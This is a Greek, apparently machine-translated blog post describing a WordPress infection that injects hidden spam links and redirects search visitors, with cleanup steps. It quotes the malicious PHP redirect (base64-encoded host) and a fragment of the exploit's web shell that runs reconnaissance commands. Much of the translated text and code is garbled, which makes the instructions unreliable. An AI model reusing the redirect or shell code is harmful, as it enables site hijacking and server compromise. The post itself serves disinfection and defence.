Τον περασμένο μήνα, έχουμε λάβει προειδοποιήσεις για ιός στο blog από ορισμένους επισκέπτες. Αρχικά αγνόησα τις προειδοποιήσεις, επειδή είχα ένα πολύ καλό antivirus (Kaspersky του 2009) και παρόλο που βρισκόμουν στο blog για πολύ καιρό, δεν έλαβα ποτέ την προειδοποίηση του ιού (.. είδα κάτι ύποπτο, το οποίο κατά την πρώτη ανανέωση εξαφανίστηκε. Τέλος ...).
Αργά, αργά έχουν αρχίσει να εμφανίζονται μεγάλες παραλλαγές του Η κυκλοφορία των επισκεπτών, μετά από την οποία πρόσφατα η κυκλοφορία μειώθηκε συνεχώς και όλο και περισσότερο άρχισε να μου λέει αυτό stealthsettings.com είναι ιοί. Χθες έλαβα από κάποιον ένα στιγμιότυπο οθόνης που έγινε όταν ο antivirus μπλοκάρει ένα γραφή Από το stealthsettings.com:Trojan-clicker.html.iframe.gr. Ήταν αρκετά πειστική για μένα να με αναζητήσω σε όλες τις πηγές. Η πρώτη ιδέα που ήρθε στο μυαλό ήταν να γίνει αναβαθμίζω στην τελευταία έκδοση του Wordpress (2.5.1), αλλά όχι πριν από τη διαγραφή όλων των αρχείων του παλαιού σεναρίου WordPress και Δημιουργία αντιγράφων ασφαλείας στη βάση δεδομένων. Αυτή η διαδικασία δεν έδωσε κανένα αποτέλεσμα και πιθανότατα θα είχε πάρει πολύ χρόνο για να μου δώσει τον θάμνο όπου το bub Αγκύλος Σε μια συζήτηση για τον καφέ, βρήκε ένας σύνδεσμος στο Google και θα ήταν καλό να το δούμε.
MyDigitallife.info, δημοσίευσαν ένα άρθρο με τον τίτλο: "WordPress Hack: Ανακτήστε και διορθώστε τη μηχανή Google και Search ή No Cookie Traffic που ανακατευθύνεται στο your-needs.info, anyresults.net, golden-info.net και άλλων παράνομων τοποθεσιών", Ποιο είναι το τέλος του καλωδίου που χρειαζόμουν.
Πρόκειται για ένα εκμεταλλεύομαι από το WordPress με βάση το cookie, που κατά τη γνώμη μου είναι πολύ περίπλοκο και γίνεται ως βιβλίο. Αρκετά έξυπνο για να φτιάξετε ένα Έγχυση SQL Στη βάση δεδομένων ιστολογίου, Για να δημιουργήσετε έναν αόρατο χρήστη σε ένα απλό ρουτίνα check in Ταμπλό->Χρήστες, Για να ελέγξετε τους διευθυντές διακομιστών και τα αρχεία "writable" (που έχουν chmod 777), για να αναζητήσουν και να εκτελώ αρχεία με προνόμια ομάδας ή ακόμα και ρίζα. Δεν ξέρω ποιο είναι το όνομα της εκμετάλλευσης και βλέπω ότι υπάρχουν λίγα γραπτά άρθρα σχετικά με αυτό, παρά το γεγονός ότι υπάρχουν πολλά μολυσμένα ιστολόγια, συμπεριλαμβανομένης της Ρουμανίας. Εντάξει ... Θα προσπαθήσω να εξηγήσω τις γενικότητες για αυτόν τον ιό.
Τι κάνει ο ιός;
Πρώτα απ 'όλα, εισάγει στις πηγές των σελίδων σε blogs, αόρατους συνδέσμους για τους επισκέπτες αλλά ορατό και ευρετήριο για τις μηχανές αναζήτησης, ειδικά το Google. Τοιουτοτροπώς Κατάταξη σελίδας μεταφοράς σε ιστότοπους που υποδεικνύονται από τον εισβολέα. Δεύτερον, εισάγεται ένα ακόμα Κωδικός ανακατεύθυνσης URL, για τους επισκέπτες που προέρχονται από το Google, το Live, το Yahoo, ... ή από έναν αναγνώστη RSS και δεν διαθέτουν τον ιστότοπο στο κουλουράκι. Και ιός ιών ανιχνεύει αυτήν την ανακατεύθυνση ως Trojan-clicker.html.
Συμπτώματα:
Η μαζική μείωση της κυκλοφορίας των επισκεπτών, ειδικά σε ιστολόγια όπου οι περισσότεροι επισκέπτες προέρχονται από το Google.
Αναγνωρίζω: (Από εδώ το πρόβλημα είναι περίπλοκο για όσους δεν γνωρίζουν πόσο phpmyadmin, PHP και Linux)
Ο. ΠΡΟΣΕΚΤΙΚΟΣ!!! Πρώτα κάντε ένα αντίγραφο ασφαλείας στη βάση δεδομένων !!!
1. Ελέγξτε για πηγές αρχείων index.php, header.php, υποσέλιδο, από το θέμα του ιστολογίου και δείτε αν υπάρχει ένας κωδικός που χρησιμοποιεί κρυπτογράφηση βάση64 Ή περιέχει "αν ($ ser ==" 1; && Siefof ($ _ cookie) == 0) "Το forma:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>... ή κάτι παρόμοιο. Διαγράψτε αυτόν τον κωδικό!
Κάντε κλικ στο PE Imagine…
Στο παραπάνω στιγμιότυπο οθόνης επέλεξα από το λάθος και "<php get_header (); ;>"Αυτός ο κώδικας πρέπει να παραμείνει.
2. Χρησιμοποιήστε phpmyadmin και μεταβείτε στη βάση δεδομένων στον πίνακα WP_USERS, πού ελέγχετε αν υπάρχει ένας ανώνυμος χρήστης, που δημιουργήθηκε την ημερομηνία του 00: 00: 00 0000-00-00 (Είναι δυνατόν στον τομέα user_login Για να γράψετε "WordPress". Σημειώστε το αναγνωριστικό αυτού του χρήστη (πεδίο ID) και, στη συνέχεια, σκουπίστε το.
Κάντε κλικ στο PE Imagine…
*Το ένα στην πράσινη γραμμή, πρέπει να διαγραφεί και να διατηρηθεί. Στην περίπτωσή του νυσταγμένος, ήταν id = 8 .
3. Πηγαίνετε στο τραπέζι WP_USERMETA, όπου πρέπει εγκατάσταση είσθε ΔΙΑΓΡΑΦΩ τις γραμμές που σχετίζονται με το αναγνωριστικό (όπου στο πεδίο user_id Εμφανίζεται η τιμή του διαγραμμένου αναγνωριστικού).
4 στο τραπέζι wp_option, μπαίνω Active_plugins Και βλέπετε τι πρόσθετο ενεργοποιείται ύποπτο. Μπορεί να χρησιμοποιήσει τελικούς όπως _old.igeff, _old.pnggg, _old.jpeg, _new.php.piff, κλπ. Συνδυασμοί ψευδών επεκτάσεων εικόνας με _old και _new.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'Σκουπίστε αυτό το plugin και μετά πηγαίνετε στο blog -> Πίνακας ελέγχου -> Plugins, όπου απενεργοποιείτε και ενεργοποιείτε ένα plugin.
Κάντε κλικ στην εικόνα, δείτε πώς εμφανίζεται το αρχείο ιού στο Active_plugins.
Ακολουθήστε τη διαδρομή στο FTP ή το SSH, που υποδεικνύεται στο ASSETS_PLUGINS και διαγράψτε το αρχείο στο διακομιστή.
5. Επίσης στο phpmyadmin, στον πίνακα wp_option, βρείτε και διαγράψτε τη σειρά που περιέχει "RIS_F541B3ABD05E7962FCAB37737F40FAD8"Και η σειρά"internal_links_cache ".
Στο Internal_Links_Cache, οι σύνδεσμοι ανεπιθύμητων μηνυμάτων που εμφανίζονται στο blog και το ένα τοποθετούνται Google Adsense, του χάκερ.
6. Συνιστάται είναι να Αλλαγή κωδικού πρόσβασης της σύνδεσης στο blog και SA Εξαλείψτε όλους τους ύποπτους χρήστες. Αναβάθμιση στην τελευταία έκδοση του WordPress και ρυθμίστε το blog για να σταματήσετε να καταγράφετε νέους χρήστες. Δεν υπάρχει απώλεια ... μπορούν να σχολιάσουν και να μην καταφέρουν.
Δοκίμασα παραπάνω για να εξηγήσω πόσο, τι πρέπει να γίνει σε μια τέτοια κατάσταση, για να καθαρίσω το blog αυτού του ιού. Το πρόβλημα είναι πολύ πιο σοβαρό από ό, τι φαίνεται και σε καμία περίπτωση δεν επιλύθηκε, επειδή χρησιμοποιούνται Ευπάθειες ασφαλείας της φιλοξενίας webserver, στον οποίο είναι το blog.
Ως το πρώτο μέτρο ασφαλείας που έχουν πρόσβαση σε Σσε, για να κάνετε κάποιους ελέγχους στο διακομιστή για να δείτε αν υπάρχουν περισσότερα αρχεία όπως * _old * και * _new. * Με τις τελειώσεις.WAND, .jpeg, .pngg, .jpgg. Αυτά τα αρχεία πρέπει να διαγραφούν. Εάν μετονομάσουμε ένα αρχείο, π.χ. top_right_old.giff σε top_right_old.php, βλέπουμε ότι στο αρχείο είναι ακριβώς ο κώδικας διακομιστή εκμετάλλευσης.
Ορισμένες χρήσιμες ενδείξεις ελέγχου, καθαρισμού και εξασφάλισης διακομιστή. (μέσω SSH)
1. CD /TMP και ελέγξτε αν υπάρχουν φακέλοι όπως tmpvflma ή άλλους συνδυασμούς παρόμοιων ονομάτων και διαγράψτε το. Δείτε στο παρακάτω στιγμιότυπο οθόνης, δύο τέτοιοι φακέλοι για μένα:
rm -rf numefolder
2. Ελέγξτε και εξαλείψτε (αλλάξτε το CHMOD) όσο το δυνατόν περισσότερο τους φακέλους με χαρακτηριστικά chmod 777
Βρείτε όλα τα εγγράψιμα αρχεία στο τρέχον DIR: Βρείτε. -TYPE F -PERM -2 -LS
Βρείτε όλους τους εγγεγμένους καταλόγους στο τρέχον DIR: Βρείτε. -TYPE D -PERM -2 -LS
Βρείτε όλους τους εγγεγμένους καταλόγους και αρχεία στο τρέχον DIR: Βρείτε. -Perm -2 -ls
3. Αναζητήστε ύποπτα αρχεία στο διακομιστή.
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"4, ΠΡΟΣΕΚΤΙΚΟΣ!!! στα αρχεία που έθεσαν το bit ΝΟΤΟΣ και Πατινάζ. Αυτά τα αρχεία εκτελούνται με τα προνόμια του χρήστη (ομάδα) ή root, όχι με εκείνα του χρήστη που εκτελεί το αρχείο. Αυτά τα αρχεία μπορούν να οδηγήσουν σε συμβιβασμό ρίζας, εάν υπάρχουν προβλήματα ασφαλείας. Εάν δεν χρησιμοποιείτε τα αρχεία με bits suid και sgid, εκτελέστε "chmod 0 " σε αυτά ή απεγκαταστήστε το πακέτο που τα περιέχει.
Η εκμετάλλευση περιέχει κάπου στην πηγή ...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}... Βασικά με αυτόν τον τρόπο βρίσκει τις φυλές στην ασφάλεια. Ανοίξτε τις θύρες, τους "γραπτούς" διευθυντές και την εκτέλεση αρχείων με προνόμια ομάδας / ρίζας.
Επιστρέφω με λεπτομέρειες ...
Μερικά μολυσμένα ιστολόγια: www.blegoo.com, www.visurat.ro,
Fulgerica.com, Denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
Blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,
Emi.brainient.com, www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,
www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,
dragos.roua.ro, www.artistul.ro/blog/,
www.mirabilismedia.ro/blog, blog.einvest.ro
... και η λίστα μπορεί να συνεχιστεί ... πάρα πολύ.
Μπορείτε να ελέγξετε εάν ένα blog είναι ιός, χρησιμοποιώντας τη μηχανή αναζήτησης Google. αντίγραφο & πάστα:
Ιστοσελίδα: www.blegoo.com Αγορά
Καληνύχτες και να αυξηθεί στη δουλειά;) Σύντομα νομίζω ότι ο Eugen θα έρθει, premiebible.imprevizible.com.
BRB :)
AT: Προσοχή! Η αλλαγή του θέματος WordPress ή η αναβάθμιση στο WordPress 2.5.1, δεν είναι μια λύση για να απαλλαγείτε από αυτόν τον ιό.
